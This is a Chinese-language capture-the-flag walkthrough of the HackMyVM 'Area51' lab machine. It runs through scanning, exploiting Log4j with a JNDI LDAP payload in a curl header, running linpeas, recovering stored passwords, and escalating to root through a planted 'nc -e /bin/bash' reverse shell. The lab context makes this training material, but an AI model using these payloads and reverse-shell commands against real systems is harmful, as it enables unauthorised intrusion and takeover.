开工了,大家新年快乐靶机信息
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51
搭建靶机
下载完Area51.ova后,使用Oracle VM VirtualBox导入即可实验环境
攻击机:VMwareKali192.168.2.148
目标机:VirtualBoxDebianIP自动获取
信息收集
nmap -sn 192.168.2.0/24
nmap -A -p- 192.168.2.108
扫描到22(SSH)、80(HTTP)、8080(HTTP)三个端口,使用火狐浏览器访问80端口,192.168.2.108
好家伙佛波乐(FBI)页面,访问下8080端口,192.168.2.108:8080目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt
扫描到一个note.txt,访问下192.168.2.108/note.txt
渗透测试
提示存在Log4j漏洞,猜测到很有可能跟8080端口有关,直接访问,使用Burp的插件log4j扫描看看存在log4j漏洞,使用poc(https://github.com/kozmer/log4j-shell-poc)拿shell在kali机器中,log4j-shell-poc目录下必须有jdk1.8.0_20文件夹的java(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)
git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
python3 poc.py --userip 192.168.2.148
nc -nvlp 9001
curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'
发现是在docker里面,上传一个linpeas.sh搜集下信息
kali机器下载好linpeas.sh,新开一个终端页面开启远程下载服务python3 -m http.server 7788
wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
cat /var/tmp/.roger,查询到roger的密码
使用ssh远程登录
ssh [email protected]
拿到user.txt下的一个FLAG=[xxxxxx]
wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
cat /etc/pam.d/kang,发现是kang的密码
su kang
发现kang的主目录发生了一些奇怪的事情,一个文件不断出现并消失
看起来像是kang用户创建了一个shell脚本,执行所有的.sh文件并删除它们echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh
nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt
成功获取到root权限下的FLAG=[xxxxx]黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬。必须原创,仅限原创。稿件当然可参考相关资料撰写!
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652885429&idx=1&sn=19b15ce14e8a53d59465fa221504487f&chksm=bd59ad788a2e246e897973b04a54dbc62a032c3702f6e7e315d8f56edb484aa175ddb1d3a23d#rd
如有侵权请联系:admin#unsafe.sh